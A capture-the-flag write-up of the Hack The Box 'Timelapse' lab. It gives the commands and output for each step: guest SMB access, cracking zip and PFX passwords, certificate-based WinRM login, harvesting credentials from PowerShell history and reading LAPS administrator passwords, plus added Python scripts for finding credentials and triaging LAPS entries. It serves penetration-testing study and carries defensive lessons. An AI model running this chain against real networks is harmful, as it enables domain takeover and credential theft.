HTB Timelapse
Dipesh Paul
April 5, 2026 (Updated: April 5, 2026)
Platform: Hack The Box
Difficulty: Easy
OS: Windows
Topics: SMB Enumeration, Password Cracking (John the Ripper), PFX Certificate Extraction, WinRM over SSL, PowerShell History Forensics, BloodHound/SharpHound, LAPS Abuse
Overview
Timelapse is a Windows Active Directory machine that chains together a realistic set of techniques you'd encounter during a real-world AD engagement. The attack path moves from anonymous SMB access → password-protected archive cracking → PFX certificate extraction for SSL-based WinRM authentication → credential recovery from a forgotten PowerShell history file → privilege escalation via LAPS read abuse. Every step in this box maps to a documented technique in the Active Directory attack playbook, making it a solid reference for C-ADPenX preparation and for demonstrating practical AD pentesting knowledge in interviews.
Recon - Nmap
Started with a full port scan across all 65535 ports to get a complete picture of what's exposed, using --min-rate to keep it fast: nmap -p- --min-rate 10000 10.129.227.113 -T4
This returned a list of open ports. From there, I ran a targeted service and script scan against only those ports for accurate version detection without wasting time on the closed ones: nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5986,9389 -sCV --min-rate 10000 10.129.227.113 -T4
Full output: Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-04 08:22 +0530
Nmap scan report for 10.129.227.113
Host is up (0.44s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-04 10:56:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb, Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/wsmans?
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: 2026-04-04T10:59:11+00:00; +8h03m37s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h03m36s, deviation: 0s, median: 8h03m36s
| smb2-time:
| date: 2026-04-04T10:58:35
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.78 seconds
Analysis:
The open ports tell a clear story before any exploitation begins:
Port 53 - DNS is running, expected on a DC. Useful for zone transfer attempts later if needed.
Port 88 - Kerberos. Confirms this is a Domain Controller. Also opens the door for AS-REP Roasting or Kerberoasting if we get valid usernames.
Port 135/139 - MSRPC and NetBIOS. Standard Windows services.
Port 389/3268 - LDAP and Global Catalog. Enumerable with valid credentials.
Port 445 - SMB. First thing to probe without credentials.
Port 464 - kpasswd5 , the Kerberos password change service. Normal on DCs.
Port 593 - RPC over HTTP. Sometimes exploitable in older configurations.
Port 636/3269 - LDAP and Global Catalog over SSL.
Port 5986 - WinRM over SSL. Standard WinRM runs on port 5985 over plain HTTP; 5986 uses HTTPS/SSL. The fact that 5985 doesn't appear in our scan at all means unencrypted WinRM is completely disabled - every remote management connection on this machine must go through SSL. The certificate nmap pulled gives us the exact hostname ( commonName=dc01.timelapse.htb ) and shows the cert is expired, but that only means our tools need to skip certificate validation. In Evil-WinRM this is handled with the -S flag, which we'll be using on every WinRM connection throughout this box regardless of which user we're authenticating as.
Port 9389 - .NET Message Framing , used by Active Directory Web Services (ADWS). This is the endpoint PowerShell's AD module communicates with.
SMB signing enabled and required - rules out SMB relay attacks (NTLM relay to SMB). Not a blocker here, just worth noting.
Clock skew of ~8 hours - significant for Kerberos, which has a default 5-minute tolerance. Kerberos-based attacks would need clock synchronization ( sudo ntpdate timelapse.htb or faketime ). In this case we won't need it since we end up using password-based WinRM, not ticket-based Kerberos.
First thing after the scan: add both timelapse.htb and dc01.timelapse.htb to /etc/hosts .
Foothold - SMB Enumeration
No credentials yet, so the first question is whether anonymous/null or guest authentication is permitted. Use netexec to probe this and enumerate shares in one shot: netexec smb 10.129.227.113 -u guest -p '' --shares
Full output: SMB 10.129.227.113 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.227.113 445 DC01 [+] timelapse.htb\guest:
SMB 10.129.227.113 445 DC01 [*] Enumerated shares
SMB 10.129.227.113 445 DC01 Share Permissions Remark
SMB 10.129.227.113 445 DC01 ----- ----------- ------
SMB 10.129.227.113 445 DC01 ADMIN$ Remote Admin
SMB 10.129.227.113 445 DC01 C$ Default share
SMB 10.129.227.113 445 DC01 IPC$ READ Remote IPC
SMB 10.129.227.113 445 DC01 NETLOGON Logon server share
SMB 10.129.227.113 445 DC01 Shares READ
SMB 10.129.227.113 445 DC01 SYSVOL Logon server share
Null Auth: True plus the successful guest logon confirm unauthenticated access is permitted. The share named Shares stands out: it has no remark (unlike the standard shares), it's readable as guest, and it's clearly non-standard. ADMIN$ and C$ are the administrative shares and need local admin rights; NETLOGON and SYSVOL are readable by any authenticated domain user, but as the empty Permissions column shows, not by guest.
Connect and pull down all the contents. Note that smbclient's -p is the port option, not the password; an empty password goes after the % in the -U string (or use -N for no password): smbclient //10.129.227.113/Shares -U 'guest%'
smb: \> ls
. D 0 Mon Oct 25 20:09:14 2021
.. D 0 Mon Oct 25 20:09:14 2021
Dev D 0 Mon Oct 25 23:10:09 2021
HelpDesk D 0 Mon Oct 25 20:48:42 2021
Two subdirectories. Check both: smb: \Dev\> ls
. D 0 Mon Oct 25 23:10:09 2021
.. D 0 Mon Oct 25 23:10:09 2021
winrm_backup.zip A 2611 Mon Oct 25 19:46:42 2021
smb: \HelpDesk\> ls
. D 0 Mon Oct 25 20:48:42 2021
.. D 0 Mon Oct 25 20:48:42 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 20:48:42 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 20:48:42 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 20:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 20:48:42 2021
Downloaded everything locally: ┌──(thegenetic㉿kali)-[~/Desktop/timelapse]
└─$ ls
LAPS_Datasheet.docx LAPS_OperationsGuide.docx LAPS_TechnicalSpecification.docx LAPS.x64.msi winrm_backup.zip
Reading the environment from the files:
The HelpDesk folder is essentially advertising that LAPS (Local Administrator Password Solution) is deployed in this domain. The presence of official Microsoft LAPS documentation and the installer MSI strongly suggests the tool is actively in use. LAPS automatically rotates local Administrator passwords on domain-joined machines and stores them as an attribute on the computer object in Active Directory. Only specific AD groups are granted read access to that attribute - a fact we'll come back to during privilege escalation.
The winrm_backup.zip in the Dev folder is the immediate priority. It's password protected.
Stage 1 - Cracking the Zip Archive
Convert the zip to a hash format that John the Ripper understands, then crack it: zip2john winrm_backup.zip > zip_hash.txt
Created directory: /home/thegenetic/.john
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
The zip2john output already tells us what's inside - legacyy_dev_auth.pfx . That's a PFX file (Personal Information Exchange), which is a PKCS#12 container holding an X.509 certificate and its associated private key. The name includes legacyy - likely a username - and dev_auth , suggesting it was created for authentication in a development context. Crack it with rockyou:
john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2026-04-04 10:16) 3.846g/s 13359Kp/s 13359Kc/s 13359KC/s suzyqzb..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Zip password: supremelegacy
Extract to get legacyy_dev_auth.pfx .
Stage 2 - Cracking the PFX File
The PFX file itself is also password protected. Same approach with pfx2john : pfx2john legacyy_dev_auth.pfx > pfx_hash.txt
# then use a wordlist to bruteforce the password
john --wordlist=/usr/share/wordlists/rockyou.txt pfx_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:00:38 DONE (2026-04-04 20:35) 0.02570g/s 83056p/s 83056c/s 83056C/s thumper1990..thsco04
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
PFX password: thuglegacy
Note that both passwords are different - the zip and PFX were independently protected, which is a detail that matters in practice. Always try to crack each layer separately rather than assuming one password covers all.
To inspect the contents of the PFX (it prompts for the import password, thuglegacy ): openssl pkcs12 -in legacyy_dev_auth.pfx -info
MAC: sha1, Iteration 2000
MAC length: 20, salt length: 20
PKCS7 Data
Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 2000
Bag Attributes
Microsoft Local Key set:
localKeyID: 01 00 00 00
friendlyName: te-4a534157-c8f1-4724-8db6-ed12f25c2a9b
Microsoft CSP Name: Microsoft Software Key Storage Provider
Key Attributes
X509v3 Key Usage: 90
-----BEGIN ENCRYPTED PRIVATE KEY-----
MIIFNTBfBgkqhkiG9w0BBQ0wUjAxBgkqhkiG9w0BBQwwJAQQAcvU0OkxHy3orCrs
...
-----END ENCRYPTED PRIVATE KEY-----
Certificate bag
Bag Attributes
localKeyID: 01 00 00 00
subject=CN=Legacyy
issuer=CN=Legacyy
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----
The certificate's subject=CN=Legacyy , together with its subject alternative name (the UPN of the legacyy account; the address is scrubbed in this copy), ties it to the domain user legacyy . It is self-signed (issuer equals subject), so the DC must carry an explicit WinRM client-certificate mapping for it. That fits with port 5986 (WinRM over SSL) being open: WinRM certificate authentication is only available on an HTTPS listener.
Certificate and Key Extraction
To use this certificate with Evil-WinRM, the cert and key need to be extracted as separate PEM files, and the key must be unencrypted: Evil-WinRM has no way to supply a PEM passphrase, so a key left encrypted simply fails at connect time. The two-step sequence below sets a passphrase and then strips it; adding -nodes to the -nocerts command writes the unencrypted key in one go. Either way, chmod 600 the key file afterwards, since it is now a bare credential for the account:
Extract the certificate only: openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
# Enter Import Password: thuglegacy
cat cert.crt
Bag Attributes
localKeyID: 01 00 00 00
subject=CN=Legacyy
issuer=CN=Legacyy
-----BEGIN CERTIFICATE-----
MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS
MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1
MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
...
-----END CERTIFICATE-----
Extract the private key (initially encrypted with a PEM passphrase): openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out encrypted_key.pem
# Enter Import Password: thuglegacy
# Set a PEM pass phrase: thuglegacy
# Verify: thuglegacy
Decrypt the private key to remove the PEM passphrase: openssl rsa -in encrypted_key.pem -out private_key.pem
# Enter pass phrase for encrypted_key.pem: (the one you just set)
# writing RSA key
cat private_key.pem
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQClVgejYhZHHuLz
TSOtYXHOi56zSocr9om854YDu/6qHBa4Nf8xFP6INNBNlYWvAxCvKM8aQsHpv3to
pwpQ+YbRZDu1NxyhvfNNTRXjdFQV9nIiKkowOt6gG2F+9O5gVF4PAnHPm+YYPwsb
oRkYV8QOpzIi6NMZgDCJrgISWZmUHqThybFW/7POme1gs6tiN1XFoPu1zNOYaIL3
dtZaazXcLw6IpTJRPJAWGttqyFommYrJqCzCSaWu9jG0p1hKK7mk6wvBSR8QfHW2
qX9+NbLKegCt+/jAa6u2V9lu+K3MC2NaSzOoIi5HLMjnrujRoCx3v6ZXL0KPCFzD
MEqLFJHxAgMBAAECggEAc1JeYYe5IkJY6nuTtwuQ5hBc0ZHaVr/PswOKZnBqYRzW
...
-----END PRIVATE KEY-----
Both files ready: cert.crt and private_key.pem .
Initial Shell - WinRM over SSL (Certificate Authentication)
Evil-WinRM supports certificate-based auth via -c (certificate) and -k (private key). The -S flag enables SSL, required since the target is on port 5986 and not the standard 5985: evil-winrm -c cert.crt -k private_key.pem -i 10.129.227.113 -S
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
Shell as timelapse\legacyy . User flag is on the desktop.
Post-Exploitation Enumeration - PowerShell History
Before running SharpHound, manual enumeration comes first. One of the most overlooked artifacts on Windows machines is the PSReadLine command history file. PSReadLine writes each command to ConsoleHost_history.txt as it is entered, not at session exit, so commands from sessions that crashed or were killed still land there, one file serves every console host the user runs, and nothing clears it by default. It's essentially a free log of everything the user has ever typed at a PS prompt:
*Evil-WinRM* PS C:\Users\legacyy> cd $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> ls
Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2022 11:46 PM 434 ConsoleHost_history.txt
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> download ConsoleHost_history.txt
Info: Downloading C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt to ConsoleHost_history.txt
Info: Download successful!
Reading the file on Kali: cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
The history shows someone was using Invoke-Command to run commands as svc_deploy over a local SSL WinRM connection - likely testing connectivity or automation. They wrote the plaintext password directly into the command, which PSReadLine silently logged.
Credentials recovered: User: svc_deploy
Password: E3R$Q62^12p7PLlC%KWaxuaV
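As an added example (not code from the original write-up), the following Python scanner runs over PSReadLine history text and pairs each ConvertTo-SecureString secret with the username from the PSCredential that later consumes it, which is exactly the shape of the file recovered above. The history block is constructed: its first lines mirror the recovered file, the net use and -Password lines are invented to exercise the other patterns, and the regexes are assumptions about common PowerShell idioms rather than a complete credential detector.

```python
"""Scan a PSReadLine ConsoleHost_history.txt for hard-coded credentials.

Added example, not part of the original post. SAMPLE_HISTORY is constructed:
the first lines mirror the file found on the box, the net use and -Password
lines are invented. The regexes are assumptions about common idioms.
"""
import re
from dataclasses import dataclass
from typing import Optional

SAMPLE_HISTORY = r"""whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
net use \\fs01\share /user:corp\backup_svc 'Winter2024!'
Invoke-Sqlcmd -ServerInstance db01 -Username sa -Password 'Sup3rS3cret!'
get-aduser -filter * -properties *
exit
"""


@dataclass
class Finding:
    line_no: int
    kind: str
    secret: str
    user: Optional[str] = None


# $var = ConvertTo-SecureString '<secret>' ... (the -AsPlainText check is done separately)
SECURESTRING_RE = re.compile(
    r"(?:\$(?P<var>\w+)\s*=\s*)?ConvertTo-SecureString\s+(?P<q>['\"])(?P<secret>[^'\"]*)(?P=q)",
    re.IGNORECASE)
# PSCredential ('<user>', $var) ties a username to a SecureString variable seen earlier
PSCRED_RE = re.compile(
    r"PSCredential\s*\(\s*(?P<q>['\"])(?P<user>[^'\"]+)(?P=q)\s*,\s*\$(?P<var>\w+)",
    re.IGNORECASE)
# net use <share> /user:<user> <password>
NETUSE_RE = re.compile(
    r"\bnet\s+use\b.*?/user:(?P<user>\S+)\s+(?P<q>['\"]?)(?P<secret>[^'\"\s]+)(?P=q)",
    re.IGNORECASE)
# any command taking -p / -Pass / -Password '<secret>'; the \s+ after the switch keeps -port out
INLINE_PW_RE = re.compile(
    r"\s-(?:p|pass|password)\s+(?P<q>['\"])(?P<secret>[^'\"]+)(?P=q)",
    re.IGNORECASE)


def scan_history(text: str) -> list:
    """One Finding per credential, with the username resolved where the history
    makes the pairing explicit (SecureString variable consumed by a PSCredential)."""
    findings = []
    by_var = {}  # SecureString variable name -> Finding awaiting a username
    for n, line in enumerate(text.splitlines(), 1):
        m = SECURESTRING_RE.search(line)
        if m and "-asplaintext" in line.lower():
            f = Finding(n, "ConvertTo-SecureString -AsPlainText", m["secret"])
            findings.append(f)
            if m["var"]:
                by_var[m["var"].lower()] = f
            continue
        m = PSCRED_RE.search(line)
        if m:
            f = by_var.get(m["var"].lower())
            if f is not None and f.user is None:
                f.user = m["user"]  # the username arrives a line after the secret
            continue
        m = NETUSE_RE.search(line)
        if m:
            findings.append(Finding(n, "net use with inline password", m["secret"], m["user"]))
            continue
        m = INLINE_PW_RE.search(line)
        if m:
            findings.append(Finding(n, "inline -Password argument", m["secret"]))
    return findings


def credential_pairs(text: str) -> list:
    """Report view: (user, secret) tuples in order of appearance."""
    return [(f.user, f.secret) for f in scan_history(text)]


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f.line_no}: {f.kind}: user={f.user!r} secret={f.secret!r}")
```

Run it against a downloaded ConsoleHost_history.txt by reading the file into scan_history; on the defensive side the same patterns make a cheap periodic sweep of every user's PSReadLine directory on jump hosts and admin workstations.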
AD Enumeration - BloodHound + SharpHound
Upload SharpHound.exe with Evil-WinRM's upload command, then run it from the compromised legacyy session: *Evil-WinRM* PS C:\Users\legacyy\Documents> .\SharpHound.exe -c All --outputdirectory .
Download the zip: *Evil-WinRM* PS C:\Users\legacyy\Documents> download 20260404174014_BloodHound.zip
Info: Downloading C:\Users\legacyy\Documents\20260404174014_BloodHound.zip to 20260404174014_BloodHound.zip
Info: Download successful!
Loading the data into BloodHound reveals the key finding: svc_deploy is a member of LAPS_Readers , and LAPS_Readers has ReadLAPSPassword permissions on the DC01 computer object.
This can also be confirmed without BloodHound using native commands. From the legacyy session, net user against the account name works because on a DC net user reads the domain database: *Evil-WinRM* PS C:\Users\legacyy\Documents> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/25/2021 12:25:53 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
LAPS_Readers membership confirmed. Remote Management Users membership means WinRM access is also available, no need for an alternate lateral movement path.
Privilege Escalation - Lateral Movement to svc_deploy
Log in directly via Evil-WinRM: evil-winrm -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -i timelapse.htb -S
Evil-WinRM shell v3.9
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami
timelapse\svc_deploy
Privilege Escalation - LAPS Password Extraction
Legacy (Microsoft) LAPS stores the managed local Administrator password in the confidential attribute ms-Mcs-AdmPwd on the computer object, with the scheduled rotation time in ms-Mcs-AdmPwdExpirationTime as a Windows FILETIME. Reading a confidential attribute takes more than generic read: the principal needs the CONTROL_ACCESS ("All extended rights") right on that attribute, which is what BloodHound labels ReadLAPSPassword. Any user in a group holding it can pull the password with a plain LDAP read. Windows LAPS, the built-in successor, uses msLAPS-Password and msLAPS-PasswordExpirationTime instead; the same queries with those attribute names find it.
Method 1 - From the svc_deploy WinRM session using Get-ADComputer: *Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName : dc01.timelapse.htb
Enabled : True
ms-mcs-admpwd : D9H[}E&8Ds7Ty1vteK@49,KQ
ms-mcs-admpwdexpirationtime : 134203126194037556
Name : DC01
ObjectClass : computer
ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName : DC01$
SID : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :
Method 2 - Directly from Kali using bloodyAD (no shell needed; netexec's laps module, nxc ldap ... -M laps , performs the same lookup): bloodyAD --host 10.129.227.113 -d timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd
distinguishedName: CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
ms-Mcs-AdmPwd: D9H[}E&8Ds7Ty1vteK@49,KQ
Local Administrator password for DC01: D9H[}E&8Ds7Ty1vteK@49,KQ
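The expiration value returned above is a raw FILETIME, which is hard to read by eye but tells you whether the password is about to rotate out from under you. As an added example (not code from the original write-up), the following Python decodes it and triages a list of LAPS entries the way both an attacker (which passwords were readable) and a defender (which hosts stopped rotating, which had their expiration pushed past policy) would want. The DC01 value is the one on the page; the other computer objects, the reference time and the 30-day policy are constructed assumptions.

```python
"""Decode ms-Mcs-AdmPwdExpirationTime and triage LAPS-managed computer objects.

Added example, not part of the original post. DC01's expiration value is the
one returned on the page; WS01, WS02, SRV01, NOW and the 30-day policy are
constructed for illustration.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional

# FILETIME counts 100-nanosecond intervals since 1601-01-01 00:00:00 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    # timedelta resolution is microseconds, so the last decimal digit is dropped
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    # integer floor-division keeps full precision (a float would lose it above 2**53)
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


@dataclass
class LapsEntry:
    dn: str
    expiration_filetime: Optional[int]  # None when the object was never LAPS-managed
    password: Optional[str] = None      # set only if ms-Mcs-AdmPwd came back in the query


def triage(entries, now: datetime, max_age: timedelta = timedelta(days=30)) -> dict:
    """Flag each entry: password readable by the querying principal, expiration in
    the past (the LAPS client stopped rotating), or expiration beyond the policy
    maximum (the attribute was written by hand; on legacy LAPS a compromised
    machine account could do that to itself unless the policy cap is enforced)."""
    report = {}
    for e in entries:
        flags = []
        if e.password is not None:
            flags.append("password-readable")
        if e.expiration_filetime is None:
            flags.append("not-laps-managed")
        else:
            exp = filetime_to_datetime(e.expiration_filetime)
            if exp < now:
                flags.append("expired-not-rotated")
            elif exp - now > max_age:
                flags.append("expiration-beyond-policy")
        report[e.dn] = flags
    return report


NOW = datetime(2026, 4, 4, 11, 0, tzinfo=timezone.utc)  # constructed: the day of the scan
SAMPLE_ENTRIES = [
    LapsEntry("CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb",
              134203126194037556, "D9H[}E&8Ds7Ty1vteK@49,KQ"),
    LapsEntry("CN=WS01,CN=Computers,DC=timelapse,DC=htb",
              datetime_to_filetime(NOW - timedelta(days=45))),
    LapsEntry("CN=WS02,CN=Computers,DC=timelapse,DC=htb",
              datetime_to_filetime(NOW + timedelta(days=3650))),
    LapsEntry("CN=SRV01,CN=Computers,DC=timelapse,DC=htb", None),
]

if __name__ == "__main__":
    print("DC01 rotates at", filetime_to_datetime(134203126194037556).isoformat())
    for dn, flags in triage(SAMPLE_ENTRIES, NOW).items():
        print(dn, flags or ["ok"])
```

Feeding it real data is a matter of building LapsEntry objects from the Get-ADComputer or bloodyAD output; the password field should be left None for any object where the attribute did not come back, because that absence is itself the access-control result you are measuring.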
Administrator Shell
evil-winrm -i dc01.timelapse.htb -u Administrator -p 'D9H[}E&8Ds7Ty1vteK@49,KQ' -S
Evil-WinRM shell v3.9
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
timelapse\administrator
Browse the users directory - the root flag isn't in Administrator's desktop on this box: *Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
*Evil-WinRM* PS C:\Users\TRX> type Desktop/root.txt
Rooted.
Key Takeaways
PSReadLine history is consistently overlooked. The path %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt should be in your standard post-exploitation checklist for every Windows engagement. This is different from the old doskey history - PSReadLine persists across sessions and is rarely cleared. When someone runs a PSCredential command with a hardcoded password, it gets logged here verbatim.
PFX files are two-layer targets. The zip had one password, the PFX had another. In real engagements, PFX files found in backups, shares, or repositories are almost always worth attempting to crack - they often contain client authentication certificates that grant direct access without needing to know a user's password.
Certificate-based WinRM is a legitimate access vector. This isn't just a CTF technique. Client certificate authentication over WinRM is used in real enterprise environments, particularly for service accounts and automation. If you find a PFX file associated with a domain account and WinRM over SSL is available, that's a direct access path.
LAPS is only as secure as its ACL. The tool itself does what it's supposed to - rotate passwords automatically. The weakness is when ReadLAPSPassword is granted to groups with too many members, or when membership of those groups isn't reviewed regularly. From an attacker's perspective, finding LAPS_Readers (or equivalent) membership on a compromised account is a reliable and low-noise path to local Administrator on managed machines. No exploitation, no payloads - just an LDAP query.
Always browse C:\Users\ after getting Administrator access. On shared lab environments (and sometimes in real engagements with multiple admin users), sensitive files can be in user directories other than Administrator's own desktop. This habit also reveals which accounts exist on the box independently of what AD says.
Dipesh Paul is a security analyst at Deloitte, based in Agartala, India. He runs the BugHunt Blueprint YouTube channel, which focuses on practical cybersecurity education through hands‑on labs and real vulnerability walkthroughs.
Connect:
LinkedIn: Dipesh Paul
YouTube: @bughuntblueprint
X (Twitter): DipeshPaul19
Support the channel: Buy Me a Coffee
This writeup is part of my C-ADPen-X prep series. All testing was done on Hack The Box's official lab environment.
#hackthebox #ethical-hacking #penetration-testing #hacking #bug-bounty